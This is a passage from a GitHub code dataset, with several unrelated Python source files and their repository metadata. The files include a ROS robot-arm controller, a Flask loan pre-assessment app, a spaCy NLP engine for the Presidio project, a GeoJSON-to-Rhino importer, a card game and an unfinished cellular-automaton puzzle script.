numpy import cos\n\nclass Solution:\n\n def __init__(self):\n self.time_previous = 0\n\n def calculate_jacobian(self, angles):\n q1 = angles[0]\n q2 = angles[1]\n q3 = angles[2]\n q4 = angles[3]\n jacobian = np.array([[3*cos(q1)*cos(q3)*sin(q2)-3*sin(q1)*sin(q3)+2*cos(q4)(cos(q1)*cos(q3)*sin(q2)-sin(q1)*sin(q3))+2*cos(q1)*cos(q2)*sin(q4),\n 3*cos(q2)*cos(q3)*sin(q1)+2*cos(q2)*cos(q3)*cos(q4)*sin(q1)-2*sin(q1)*sin(q2)*sin(q4),\n 3*cos(q1)*cos(q3)-3*sin(q1)*sin(q2)*sin(q3)+2*cos(q4)(cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3)),\n 2*cos(q2)*cos(q4)*sin(q1)-2(cos(q3)*sin(q1)*sin(q2)+cos(q1)*sin(q3))*sin(q4)],\n [3*cos(q3)*sin(q1)*sin(q2)+3*cos(q1)*sin(q3)+2*cos(q4)(cos(q3)*sin(q1)*sin(q2)+cos(q1)*sin(q3))+2*cos(q2)*sin(q1)*sin(q4),\n -3*cos(q1)*cos(q2)*cos(q3)-2*cos(q1)*cos(q2)*cos(q3)*cos(q4)+2*cos(q1)*sin(q2)*sin(q4),\n 3*cos(q3)*sin(q1)+3*cos(q1)*sin(q2)*sin(q3)+2*cos(q4)(cos(q3)*sin(q1)+cos(q1)*sin(q2)*sin(q3)),\n -2*cos(q1)*cos(q2)*cos(q4)-2(-cos(q1)*cos(q3)*sin(q2)+sin(q1)*sin(q3))*sin(q4)],\n [0,\n -3*cos(q3)*sin(q2)-2*cos(q3)*cos(q4)*sin(q2)-2*cos(q2)*sin(q4),\n -3*cos(q2)*sin(q3)-2*cos(q2)*cos(q4)*sin(q3),\n -2*cos(q4)*sin(q2)-2*cos(q2)*cos(q3)*sin(q4)]])\n return jacobian\n\n def control_closed(self, angles):\n \"\"\"Finds\n\n :param angles: list of joints(initial) [q1, q2, q3, q4]\n :return joints angles [q1, q2, q3, q4]\n \"\"\"\n # P gains\n K_p = np.array([[1, 0, 0],\n [0, 1, 0],\n [0, 0, 1]])\n # D gains\n K_d = np.array([[0.1, 0, 0],\n [0, 0.1, 0],\n [0, 0, 0.1]])\n\n cur_time = rospy.get_time()\n dt = cur_time - self.time_previous\n self.time_previous = cur_time\n # robot end-effector position\n pos_end = self.target_coordinates(red, yellow, blue)\n # target position\n pos_target = self.target_coordinates(target, yellow, blue)\n # estimate derivative of error\n self.error_d = ((pos_target - pos_end) - self.error)/dt\n # estimate error\n self.error = pos_target - pos_end\n\n J_inv = np.linalg.pinv(self.calculate_jacobian(angles)) # calculate the psudeo inverse of Jacobian\n # angular velocity of joints\n dq_d = np.dot(J_inv, (np.dot(K_d, self.error_d.T) + np.dot(K_p, self.error.T)))\n # angular position of joints\n q_d = angles + (dt * dq_d)\n return q_d\n\n\n","repo_name":"gong7788/ivr_assignment","sub_path":"src/close_loop.py","file_name":"close_loop.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36237342197","text":"\"\"\"Serialization of projects for display purposes\"\"\"\n\nfrom pathlib import Path\nfrom typing import Tuple, Optional\n\nfrom rich.console import Console\nfrom rich.markdown import Markdown\nfrom rich.table import Table\n\nfrom ... import Repository\nfrom ....project import load_project\nfrom ....projects import ProjectWithDependents\nfrom ....projects.find import load_projects, find_dependencies\n\n\ndef print_project(repo: Repository, console: Console, project_path: str):\n project = load_project(repo.root_dir, Path(project_path), False)\n other_projects = load_projects(repo.root_dir, repo.find_projects())\n\n with_dependencies = find_dependencies(project, other_projects)\n\n table, readme = project_to_markdown(with_dependencies)\n console.print(table, readme)\n\n\ndef project_to_markdown(\n with_dependencies: ProjectWithDependents,\n) -> Tuple[Table, Optional[Markdown]]:\n project = with_dependencies.project\n table = Table(title=f\"Project {project.name}\", show_header=False)\n table.add_row(\"Name\", project.name)\n table.add_row(\"Path\", project.path)\n table.add_row(\"Description\", project.description)\n table.add_row(\"Maintainer\", f\"{project.maintainer}\")\n table.add_row(\"Stages\", f\"{project.stages}\")\n if with_dependencies.dependent_projects:\n table.add_row(\n \"Dependent projects\", f\"{set(with_dependencies.dependent_projects.keys())}\"\n )\n readme = Path(project.root_path, \"README.md\")\n return (\n table,\n Markdown(readme.read_text(encoding=\"utf-8\")) if readme.exists() else None,\n )\n","repo_name":"Vandebron/mpyl","sub_path":"src/mpyl/cli/commands/projects/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"95"} +{"seq_id":"4003973345","text":"from flask import Flask, render_template, request\r\n\r\napp = Flask(__name__)\r\n\r\n# Mocked balance sheet data for demonstration\r\nbalance_sheet_data = [\r\n {\r\n \"year\": 2022,\r\n \"month\": 12,\r\n \"profitOrLoss\": 15000,\r\n \"assetsValue\": 120000\r\n },\r\n {\r\n \"year\": 2022,\r\n \"month\": 11,\r\n \"profitOrLoss\": 12000,\r\n \"assetsValue\": 130000\r\n },\r\n {\r\n \"year\": 2022,\r\n \"month\": 10,\r\n \"profitOrLoss\": 8000,\r\n \"assetsValue\": 110000\r\n },\r\n {\r\n \"year\": 2022,\r\n \"month\": 9,\r\n \"profitOrLoss\": -5000,\r\n \"assetsValue\": 105000\r\n }\r\n]\r\n\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if request.method == 'POST':\r\n\r\n data = request.form\r\n\r\n business_name = data.get('businessName', '')\r\n year_established = data.get('yearEstablished', '')\r\n loan_amount = float(data.get('loanAmount', 0))\r\n accounting_provider = data.get('accountingProvider', '')\r\n\r\n last_12_months = balance_sheet_data[:12]\r\n made_profit = any(profit['profitOrLoss'] > 0 for profit in last_12_months) #made profit in 12 months\r\n asset_values = [asset['assetsValue'] for asset in last_12_months] #calculating avrage of asset values\r\n avg_asset_value = sum(asset_values) / len(asset_values)\r\n\r\n if made_profit:\r\n pre_assessment = 60\r\n elif avg_asset_value >= loan_amount:\r\n pre_assessment = 100\r\n else:\r\n pre_assessment = 20\r\n\r\n\r\n loan_application_result = {\r\n 'businessName': business_name,\r\n 'yearEstablished': year_established,\r\n 'preAssessment': pre_assessment,\r\n 'accounting_provider':accounting_provider\r\n }\r\n\r\n return render_template('index.html', result=loan_application_result, show_result=True)\r\n return render_template('index.html', show_result=False)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"hema-prema/business_loan_web","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12636611057","text":"from project.apps.nearest_bank_api.domain.emums import ServiceActivityEnum\nfrom project.apps.nearest_bank_api.models import Atm, SalePoint\nfrom project.apps.nearest_bank_api.selectors.atm import atm_get_list\nfrom project.apps.nearest_bank_api.selectors.sale_points import sale_point_get_list\n\n\ndef unified_points_get_queryset() -> list[Atm | SalePoint]:\n # Функция для объединения двух queryset в один список\n unified_list = list(sale_point_get_list()) + list(atm_get_list())\n return unified_list\n\n\ndef unified_point_get_active_service_id_list(unified_point: Atm | SalePoint) -> list[int]:\n if isinstance(unified_point, Atm):\n available_services = unified_point.services.filter(\n atmservicethrough__serviceActivity=ServiceActivityEnum.AVAILABLE.value\n )\n elif isinstance(unified_point, SalePoint):\n available_services = unified_point.services.filter(\n salepointservicethrough__serviceActivity=ServiceActivityEnum.AVAILABLE.value\n )\n\n return available_services.values_list('id', flat=True)\n","repo_name":"gt005/vtb_hackathon_5.0","sub_path":"backend/project/apps/nearest_bank_api/selectors/unified_points.py","file_name":"unified_points.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"700091134","text":"import logging\nfrom typing import Optional, Dict, Iterator, Tuple, Union, List\n\nimport spacy\n\nfrom spacy.language import Language\nfrom spacy.tokens import Doc, Span\n\nfrom presidio_analyzer.nlp_engine import NlpArtifacts, NlpEngine, NerModelConfiguration\n\nlogger = logging.getLogger(\"presidio-analyzer\")\n\n\nclass SpacyNlpEngine(NlpEngine):\n \"\"\"\n SpacyNlpEngine is an abstraction layer over the nlp module.\n\n It provides processing functionality as well as other queries\n on tokens.\n The SpacyNlpEngine uses SpaCy as its NLP module\n \"\"\"\n\n engine_name = \"spacy\"\n is_available = bool(spacy)\n\n def __init__(\n self,\n models: Optional[List[Dict[str, str]]] = None,\n ner_model_configuration: Optional[NerModelConfiguration] = None,\n ):\n \"\"\"\n Initialize a wrapper on spaCy functionality.\n\n :param models: Dictionary with the name of the spaCy model per language.\n For example: models = [{\"lang_code\": \"en\", \"model_name\": \"en_core_web_lg\"}]\n :param ner_model_configuration: Parameters for the NER model.\n See conf/spacy.yaml for an example\n \"\"\"\n if not models:\n models = [{\"lang_code\": \"en\", \"model_name\": \"en_core_web_lg\"}]\n self.models = models\n\n if not ner_model_configuration:\n ner_model_configuration = NerModelConfiguration(self.engine_name)\n self.ner_model_configuration = ner_model_configuration\n\n self.nlp = None\n\n def load(self) -> None:\n \"\"\"Load the spaCy NLP model.\"\"\"\n logger.debug(f\"Loading SpaCy models: {self.models}\")\n\n self.nlp = {}\n # Download spaCy model if missing\n for model in self.models:\n self._validate_model_params(model)\n self._download_spacy_model_if_needed(model[\"model_name\"])\n self.nlp[model[\"lang_code\"]] = spacy.load(model[\"model_name\"])\n\n @staticmethod\n def _download_spacy_model_if_needed(model_name: str) -> None:\n if not spacy.util.is_package(model_name):\n logger.warning(f\"Model {model_name} is not installed. Downloading...\")\n spacy.cli.download(model_name)\n logger.info(f\"Finished downloading model {model_name}\")\n\n @staticmethod\n def _validate_model_params(model: Dict) -> None:\n if \"lang_code\" not in model:\n raise ValueError(\"lang_code is missing from model configuration\")\n if \"model_name\" not in model:\n raise ValueError(\"model_name is missing from model configuration\")\n if not isinstance(model[\"model_name\"], str):\n raise ValueError(\"model_name must be a string\")\n\n def get_supported_entities(self) -> List[str]:\n \"\"\"Return the supported entities for this NLP engine.\"\"\"\n if not self.ner_model_configuration.model_to_presidio_entity_mapping:\n raise ValueError(\n \"model_to_presidio_entity_mapping is missing from model configuration\"\n )\n return list(\n set(self.ner_model_configuration.model_to_presidio_entity_mapping.values())\n )\n\n def is_loaded(self) -> bool:\n \"\"\"Return True if the model is already loaded.\"\"\"\n return self.nlp is not None\n\n def process_text(self, text: str, language: str) -> NlpArtifacts:\n \"\"\"Execute the SpaCy NLP pipeline on the given text and language.\"\"\"\n if not self.nlp:\n raise ValueError(\"NLP engine is not loaded. Consider calling .load()\")\n\n doc = self.nlp[language](text)\n return self._doc_to_nlp_artifact(doc, language)\n\n def process_batch(\n self,\n texts: Union[List[str], List[Tuple[str, object]]],\n language: str,\n as_tuples: bool = False,\n ) -> Iterator[Optional[NlpArtifacts]]:\n \"\"\"Execute the NLP pipeline on a batch of texts using spacy pipe.\n\n :param texts: A list of texts to process.\n :param language: The language of the texts.\n :param as_tuples: If set to True, inputs should be a sequence of\n (text, context) tuples. Output will then be a sequence of\n (doc, context) tuples. Defaults to False.\n \"\"\"\n\n if not self.nlp:\n raise ValueError(\"NLP engine is not loaded. Consider calling .load()\")\n\n texts = (str(text) for text in texts)\n docs = self.nlp[language].pipe(texts, as_tuples=as_tuples)\n for doc in docs:\n yield doc.text, self._doc_to_nlp_artifact(doc, language)\n\n def is_stopword(self, word: str, language: str) -> bool:\n \"\"\"\n Return true if the given word is a stop word.\n\n (within the given language)\n \"\"\"\n return self.nlp[language].vocab[word].is_stop\n\n def is_punct(self, word: str, language: str) -> bool:\n \"\"\"\n Return true if the given word is a punctuation word.\n\n (within the given language).\n \"\"\"\n return self.nlp[language].vocab[word].is_punct\n\n def get_nlp(self, language: str) -> Language:\n \"\"\"\n Return the language model loaded for a language.\n\n :param language: Language\n :return: Model from spaCy\n \"\"\"\n return self.nlp[language]\n\n def _doc_to_nlp_artifact(self, doc: Doc, language: str) -> NlpArtifacts:\n lemmas = [token.lemma_ for token in doc]\n tokens_indices = [token.idx for token in doc]\n\n entities = self._get_entities(doc)\n scores = self._get_scores_for_entities(doc)\n\n entities, scores = self._get_updated_entities(entities, scores)\n\n return NlpArtifacts(\n entities=entities,\n tokens=doc,\n tokens_indices=tokens_indices,\n lemmas=lemmas,\n nlp_engine=self,\n language=language,\n scores=scores,\n )\n\n def _get_entities(self, doc: Doc) -> List[Span]:\n \"\"\"\n Extract entities out of a spaCy pipeline, depending on the type of pipeline.\n\n For normal spaCy, this would be doc.ents\n :param doc: the output spaCy doc.\n :return: List of entities\n \"\"\"\n\n return doc.ents\n\n def _get_scores_for_entities(self, doc: Doc) -> List[float]:\n \"\"\"Extract scores for entities from the doc.\n\n Since spaCy does not provide confidence scores for entities by default,\n we use the default score from the ner model configuration.\n :param doc: SpaCy doc\n \"\"\"\n\n entities = doc.ents\n scores = [self.ner_model_configuration.default_score] * len(entities)\n return scores\n\n def _get_updated_entities(\n self, entities: List[Span], scores: List[float]\n ) -> Tuple[List[Span], List[float]]:\n \"\"\"\n Get an updated list of entities based on the ner model configuration.\n\n Remove entities that are in labels_to_ignore,\n update entity names based on model_to_presidio_entity_mapping\n\n :param entities: Entities that were extracted from a spaCy pipeline\n :param scores: Original confidence scores for the entities extracted\n :return: Tuple holding the entities and confidence scores\n \"\"\"\n if len(entities) != len(scores):\n raise ValueError(\"Entities and scores must be the same length\")\n\n new_entities = []\n new_scores = []\n\n mapping = self.ner_model_configuration.model_to_presidio_entity_mapping\n to_ignore = self.ner_model_configuration.labels_to_ignore\n for ent, score in zip(entities, scores):\n # Remove model labels in the ignore list\n if ent.label_ in to_ignore:\n continue\n\n # Update entity label based on mapping\n if ent.label_ in mapping:\n ent.label_ = mapping[ent.label_]\n else:\n logger.warning(\n f\"Entity {ent.label_} is not mapped to a Presidio entity, \"\n f\"but keeping anyway. \"\n f\"Add to `NerModelConfiguration.labels_to_ignore` to remove.\"\n )\n\n # Remove presidio entities in the ignore list\n if ent.label_ in to_ignore:\n continue\n\n new_entities.append(ent)\n\n # Update score if entity is in low score entity names\n if ent.label_ in self.ner_model_configuration.low_score_entity_names:\n score *= self.ner_model_configuration.low_confidence_score_multiplier\n\n new_scores.append(score)\n\n return new_entities, new_scores\n","repo_name":"microsoft/presidio","sub_path":"presidio-analyzer/presidio_analyzer/nlp_engine/spacy_nlp_engine.py","file_name":"spacy_nlp_engine.py","file_ext":"py","file_size_in_byte":8463,"program_lang":"python","lang":"en","doc_type":"code","stars":2530,"dataset":"github-code","pt":"95"} +{"seq_id":"14509391824","text":"\"\"\"\nAllows for the translation of GeoJSON data to Rhino objects\n\nGeoJSON _does_ support 3d, so this can take 3d coordinates for 3d GeoJSONs\n\nThe GeoJSON Format Specification can be found here:\n http://geojson.org/geojson-spec.html\n\nThe RhinoCommon SDK (where all the Rhino.Geometry objects are documented) is\nhere:\n http://www.rhino3d.com/5/rhinocommon/\n\nI have decided to extend the GeoJSON specification by adding support for one\nmore type of geometry that would be really useful in Rhino (and elsewhere),\nthe Mesh. Here is an example of a json Mesh:\n\n {\"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Mesh\",\n \"coordinates\": [\n [3.43, 54.234, 2343.23],\n [...],\n [...],\n ...,\n ]\n \"faces\": [\n [0,3,2],\n [5,32,1],\n ...,\n ]\n }\n \"properties\": {\"prop0\": \"value0\"}\n }\n\n\nExample of Use:\n >>> import GeoJson2Rhino as geoj\n >>> myGeoJson = '''\n{ \"type\": \"FeatureCollection\",\n \"features\": [\n { \"type\": \"Feature\",\n \"geometry\": {\"type\": \"Point\", \"coordinates\": [102.0, 0.5]},\n \"properties\": {\"prop0\": \"value0\"}\n },\n { \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"LineString\",\n \"coordinates\": [\n [102.0, 0.0], [103.0, 1.0], [104.0, 0.0], [105.0, 1.0]\n ]\n },\n \"properties\": {\n \"prop0\": \"value0\",\n \"prop1\": 0.0\n }\n },\n { \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [\n [ [100.0, 0.0], [101.0, 0.0], [101.0, 1.0],\n [100.0, 1.0], [100.0, 0.0] ]\n ]\n },\n \"properties\": {\n \"prop0\": \"value0\",\n \"prop1\": {\"this\": \"that\"}\n }\n }\n ]\n }'''\n >>> guidList = geoj.load(myGeoJson) #stores guids of new rhino objects\n\n\"\"\"\n\n# Import standard library modules\nimport json\n\n# Import Rhino modules\nimport Rhino\nfrom Rhino.Geometry import *\nfrom scriptcontext import doc\n\n# import .NET libraries\nimport System\n\n\ndef addRhinoLayer(layerName, layerColor=System.Drawing.Color.Black):\n \"\"\"Creates a Layer in Rhino using a name and optional color. Returns the\n index of the layer requested. If the layer\n already exists, the color is updated and no new layer is created.\"\"\"\n docLyrs = doc.Layers\n layerIndex = docLyrs.Find(layerName, True)\n if layerIndex == -1:\n layerIndex = docLyrs.Add(layerName,layerColor)\n else: # it exists\n layer = docLyrs[layerIndex] # so get it\n if layer.Color != layerColor: # if it has a different color\n layer.Color = layerColor # reset the color\n return layerIndex\n\ndef PointToRhinoPoint(coordinates):\n if len(coordinates) > 2:\n z = coordinates[2]\n else:\n z = 0.0\n x, y = coordinates[0], coordinates[1]\n return Point3d(x, y, z)\n\ndef MultiPointToRhinoPoint(coordinates):\n rhPointList = []\n for point in coordinates:\n rhPointList.append(PointToRhinoPoint(point))\n return rhPointList\n\ndef MeshToRhinoMesh(coordinates, faces):\n rhMesh = Mesh()\n for point in coordinates:\n rhPoint = PointToRhinoPoint(point)\n rhMesh.Vertices.Add(rhPoint)\n for face in faces:\n i, j, k = tuple(face)\n mFace = MeshFace(i, j, k)\n rhMesh.Faces.AddFace(mFace)\n rhMesh.Normals.ComputeNormals()\n rhMesh.Compact()\n return rhMesh\n\ndef LineStringToRhinoCurve(coordinates):\n rhPoints = MultiPointToRhinoPoint(coordinates)\n return Curve.CreateControlPointCurve(rhPoints, 1)\n\ndef MultiLineStringToRhinoCurve(coordinates):\n rhCurveList = []\n for lineString in coordinates:\n rhCurveList.append(LineStringToRhinoCurve(lineString))\n return rhCurveList\n\ndef PolygonToRhinoCurve(coordinates):\n # each ring is a separate list of coordinates\n ringList = []\n for ring in coordinates:\n ringList.append(LineStringToRhinoCurve(ring))\n return ringList\n\ndef MultiPolygonToRhinoCurve(coordinates):\n polygonList = []\n for polygon in coordinates:\n polygonList.append(PolygonToRhinoCurve(polygon))\n return polygonList\n\ndef GeometryCollectionToParser(geometries):\n pass # I need to figure this one out still\n\ndef addPoint(rhPoint, objAtt):\n return doc.Objects.AddPoint(rhPoint, objAtt)\n\ndef addPoints(rhPoints, objAtt):\n guidList = []\n for rhPoint in rhPoints:\n guidList.append(doc.Objects.AddPoint(rhPoint, objAtt))\n return guidList\n\ndef addCurve(rhCurve, objAtt):\n return doc.Objects.AddCurve(rhCurve, objAtt)\n\ndef addCurves(rhCurves, objAtt):\n guidList = []\n for curve in rhCurves:\n guidList.append(addCurve(curve, objAtt))\n return guidList\n\ndef addPolygon(ringList, objAtt):\n # for now this just makes curves\n # but maybe it should make TrimmedSrfs\n # or should group the rings\n return addCurves(ringList, objAtt)\n\ndef addPolygons(polygonList, objAtt):\n guidList = []\n for polygon in polygonList:\n # !! Extending the guid list !!!\n guidList.extend(addPolygon(polygon, objAtt))\n return guidList\n\ndef addMesh(rhMesh, objAtt):\n return doc.Objects.AddMesh(rhMesh, objAtt)\n\ngeoJsonGeometryMap = {\n 'Point':(PointToRhinoPoint, addPoint),\n 'MultiPoint':(MultiPointToRhinoPoint, addPoints),\n 'LineString':(LineStringToRhinoCurve, addCurve),\n 'MultiLineString':(MultiLineStringToRhinoCurve, addCurves),\n 'Polygon':(PolygonToRhinoCurve, addPolygon),\n 'MultiPolygon':(MultiPolygonToRhinoCurve, addPolygons),\n 'Mesh':(MeshToRhinoMesh, addMesh),\n 'GeometryCollection':(GeometryCollectionToParser),\n }\n\ndef setUserKeys(properties, objAttributes):\n for key in properties:\n objAttributes.SetUserString(key, str(properties[key]))\n return objAttributes\n\ndef jsonToRhinoCommon(jsonFeature):\n # deal with the geometry\n geom = jsonFeature['geometry']\n geomType = geom['type'] # this will return a mappable string\n coordinates = geom['coordinates']\n # if this is a mesh, pass the faces\n if geomType == 'Mesh':\n faces = geom['faces']\n rhFeature = geoJsonGeometryMap[geomType][0](coordinates, faces)\n # translate the coordinates to Rhino.Geometry objects\n else:\n rhFeature = geoJsonGeometryMap[geomType][0](coordinates)\n return rhFeature\n\ndef addJsonFeature(jsonFeature, objAttributes):\n # deal with the properties\n if jsonFeature['properties']:\n objAttributes = setUserKeys(jsonFeature['properties'], objAttributes)\n geomType = jsonFeature['geometry']['type']\n rhFeature = jsonToRhinoCommon(jsonFeature)\n # return the GUID(s) for the feature\n return geoJsonGeometryMap[geomType][1](rhFeature, objAttributes)\n\ndef processGeoJson(parsedGeoJson,\n destinationLayer=None,\n destinationLayerColor=System.Drawing.Color.Black):\n # get the features\n jsonFeatures = parsedGeoJson['features']\n guidResults = []\n # set up object attributes\n for jsonFeature in jsonFeatures: # for each feature\n att = Rhino.DocObjects.ObjectAttributes()\n # setup layer if requested\n if destinationLayer != None:\n att.LayerIndex = addRhinoLayer(destinationLayer,\n destinationLayerColor)\n guidResults.append(addJsonFeature(jsonFeature, att))\n # return all the guids\n return guidResults\n\ndef load(rawJsonData,\n destinationLayer=None,\n destinationLayerColor=System.Drawing.Color.Black):\n # if the data already appears to be a dict literal ...\n if type(rawJsonData) == dict:\n jsonData = rawJsonData\n else: # otherwise, just try to load it\n jsonData = json.loads(rawJsonData)\n # if this is just a GeoJSON ...\n if jsonData[\"type\"] == \"FeatureCollection\":\n # process the GeoJSON, pass the layer and color in\n return processGeoJson(jsonData, destinationLayer,\n destinationLayerColor)\n # or if this is a set of layers from PostSites ...\n elif jsonData[\"type\"] == \"LayerCollection\":\n # make a list for all the guids\n allResults = []\n layersList = jsonData['layers']\n for layer in layersList: # for each layer\n name = layer['name'] # get the name\n if 'color' in layer: # get the color if it exists\n color = layer['color']\n else:\n color = destinationLayerColor # or just make it black\n geoJson = layer['contents'] # get the GeoJSON for this layer\n # make it\n layerResults = processGeoJson( geoJson, name, color )\n allResults.append(layerResults)\n return allResults\n else:\n return \"This doesn't look like correctly formatted GeoJSON data.\\nI'm not sure what to do with it, sorry.\"\n\n","repo_name":"localcode/rhinopythonscripts","sub_path":"GeoJson2Rhino.py","file_name":"GeoJson2Rhino.py","file_ext":"py","file_size_in_byte":9121,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"95"} +{"seq_id":"35078358435","text":"from pydantic import Field, BaseModel\nfrom typing import Any\nfrom enum import Enum\n\nfrom .base import CycloneBaseModel\n\n\nclass CredentialsType(int, Enum):\n mailgun = 1\n sendgrid = 2\n\n\nclass Credentials(CycloneBaseModel):\n type: int = Field(\n description=\"The supported mail provider for the application\", example=1\n )\n values: dict[str, Any] | None = Field(\n description=\"Relevant configuration values for the mail provider\",\n example={\n \"client_id\": \"xsf-440dkdd-djdj\",\n \"client_secret\": \"kdkdk-40djdkd-dkdkd\",\n },\n )\n\n\nclass CredentialsUpdate(BaseModel):\n type: CredentialsType | None = Field(\n default=None,\n description=\"The supported mail provider for the application\",\n example=\"mailgun\",\n )\n values: dict[str, Any] | None = Field(\n default=None,\n description=\"Relevant configuration values for the mail provider\",\n example={\n \"client_id\": \"xsf-440dkdd-djdj\",\n \"client_secret\": \"kdkdk-40djdkd-dkdkd\",\n },\n )\n","repo_name":"bayitt/cyclone","sub_path":"cyclone/schemas/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5969273948","text":"from dealer import Dealer\r\nfrom trick import Trick\r\nfrom players import Player\r\nimport os\r\nfrom utils import gap\r\nfrom display import PlayerDisplay\r\nclass Game:\r\n def __init__(self, player: Player) -> None:\r\n self.player = player\r\n self.dealer=Dealer()\r\n self.tricks=[]\r\n self.show_card=False\r\n self.score=[0 for i in range(4)]\r\n\r\n\r\n\r\n def start(self):\r\n os.system('clear')\r\n\r\n player=self.player.get_player_name()\r\n print(f\"Player 1: {player} \")\r\n\r\n dealed_cards = self.dealer.getCards()\r\n\r\n \"\"\" 3. Play Cards \"\"\"\r\n # TODO will move to server interface for client communicaiton\r\n # should we instantiate it here or in another factory ??\r\n # we can refactor this with new method or transferring to Trick Class\r\n trick_starter=0\r\n\r\n for i in range(13):\r\n\r\n trick=Trick()\r\n\r\n\r\n for player in range(trick_starter, 4+trick_starter):\r\n player=player%4\r\n player_hand=dealed_cards[player]\r\n player_hand_cards = player_hand.get_hand_cards()\r\n\r\n player_display = PlayerDisplay()\r\n player_display.set_trick(trick=trick)\r\n player_display.display(player=player, cards = player_hand_cards)\r\n\r\n card_number=int(input(\"Play a Card:\" ))\r\n\r\n # TODO optimize korte hobe\r\n while trick.get_basesuit() != player_hand_cards[card_number-1].suit and trick.get_basesuit() != None and player_hand.has_basesuit(trick.get_basesuit()):\r\n player_display.set_massage(f\"Base Suit: {trick.get_basesuit()}\")\r\n player_display.set_massage(f\"You Played: {player_hand_cards[card_number-1]}\")\r\n player_display.display(player,player_hand_cards)\r\n\r\n card_number=int(input(\"Play a Card With Same Suit:\" ))\r\n\r\n trick.play(player_hand_cards[card_number-1],player)\r\n player_hand_cards.remove(player_hand_cards[card_number-1])\r\n # player_display.set_trick(trick=trick)\r\n os.system('clear')\r\n\r\n\r\n player_display.set_trick(trick=trick)\r\n self.display_scoreboard()\r\n trick.display_trick_state()\r\n\r\n \"\"\"# ! ------- section -------\r\n\r\n # ! Player One\r\n\r\n\r\n trick.display_trick_state()\r\n self.display_cards(cards)\r\n card_number=int(input(\"Play a Card:\" ))\r\n trick.play(cards[card_number-1])\r\n os.system('clear')\r\n trick.display_trick_state()\r\n\r\n # ! Player two\r\n card_number=int(input(\"Play a Card:\" ))\r\n trick.play(cards[card_number-1])\r\n trick.display_trick_state()\r\n\r\n # ! Player three\r\n card_number=int(input(\"Play a Card:\" ))\r\n trick.play(cards[card_number-1])\r\n trick.display_trick_state()\r\n\r\n # ! Player four\r\n card_number=int(input(\"Play a Card:\" ))\r\n trick.play(cards[card_number-1])\r\n trick.display_trick_state()\r\n\r\n # ! ------- end section -------\"\"\"\r\n\r\n \"\"\"4. Display Winner Of the Trick\"\"\"\r\n self.tricks.append(trick)\r\n trick.display_winner()\r\n trick_starter= trick.get_winner_player()\r\n self.score[trick_starter]+=1\r\n input(\"\\n\\nPress enter to continue...\")\r\n os.system('clear')\r\n self.display_scoreboard()\r\n\r\n ## 5. Play Next Card till last card\r\n def display_cards(self, cards : list):\r\n hand= \"\\t\".join(f\"{card}\" for card in cards)\r\n serial=\"\\t\\t\".join(f\"{i}\" for i in range(1,len(cards)+1))\r\n print(f\"{hand}\\n{serial}\")\r\n\r\n gap(4)\r\n\r\n def display_all_players_card(self,dealed_cards):\r\n if self.show_card:\r\n for i in range(4):\r\n print(f\"\\t Player {i+1} \\t: \\tCards\")\r\n self.display_cards(dealed_cards[i])\r\n print(\"\\n\\n\")\r\n\r\n\r\n def display_scoreboard(self):\r\n print(\"SCORECARD: \")\r\n if self.tricks:\r\n for trick in self.tricks:\r\n trick.display_winner()\r\n gap(1)\r\n\r\n if len(self.tricks)==13:\r\n self.display_player_stat()\r\n self.display_game_winner()\r\n\r\n def game_winner(self):\r\n max_win=max(self.score)\r\n return self.score.index(max_win) +1\r\n\r\n def display_game_winner(self):\r\n print(f\"\\t\\t\\tPlayer {self.game_winner()} Won !!!! \")\r\n\r\n def display_player_stat(self):\r\n for i in range(4):\r\n print(f\"Player {i+1} --> {self.score[i]}\")\r\n\r\n\r\n","repo_name":"redwanratu/DeckOfCarsV2","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15714011454","text":"from functools import reduce\nfrom sys import stdin\nimport math\n\ndef get_stdin():\n return [line.rstrip() for line in stdin]\n\nlines = get_stdin()\nsteps = 6\n\n# saves time on part 2 vs iterating over full cube from round 1\ndef extendminimamaxima(bounds, x,y,z,w):\n if x < bounds[0][0]:\n bounds[0][0] = x\n if y < bounds[0][1]:\n bounds[0][1] = y\n if z < bounds[0][2]:\n bounds[0][2] = z\n if w < bounds[0][3]:\n bounds[0][3] = w\n if x > bounds[1][0]:\n bounds[1][0] = x\n if y > bounds[1][1]:\n bounds[1][1] = y\n if z > bounds[1][2]:\n bounds[1][2] = z\n if w > bounds[1][3]:\n bounds[1][3] = w\n return bounds\n\ndef isactive(grid, x, y, z, w):\n a = grid.get((x,y,z,w))\n return a is not None\n\ndef setactive(grid, bounds,x,y,z,w):\n grid[(x,y,z,w)] = True\n return extendminimamaxima(bounds, x,y,z,w)\n\ndef setinactive(grid, x,y,z,w):\n grid.popitem((x,y,z,w))\n\ndef activeneighbours3d(grid, x,y,z,w):\n activecount = 0\n for x1 in [x-1, x, x+1]:\n for y1 in [y-1, y, y+1]:\n for z1 in [z-1, z, z+1]:\n if x1 != x or y1 != y or z1 != z:\n if isactive(grid,x1,y1,z1,0):\n activecount += 1\n return activecount\n\ndef nextgrid3d(grid, bounds):\n nextgrid = {}\n for x in range(bounds[0][0]-1, bounds[1][0]+2):\n for y in range(bounds[0][1]-1, bounds[1][1]+2):\n for z in range(bounds[0][2]-1, bounds[1][2]+2):\n neighbours = 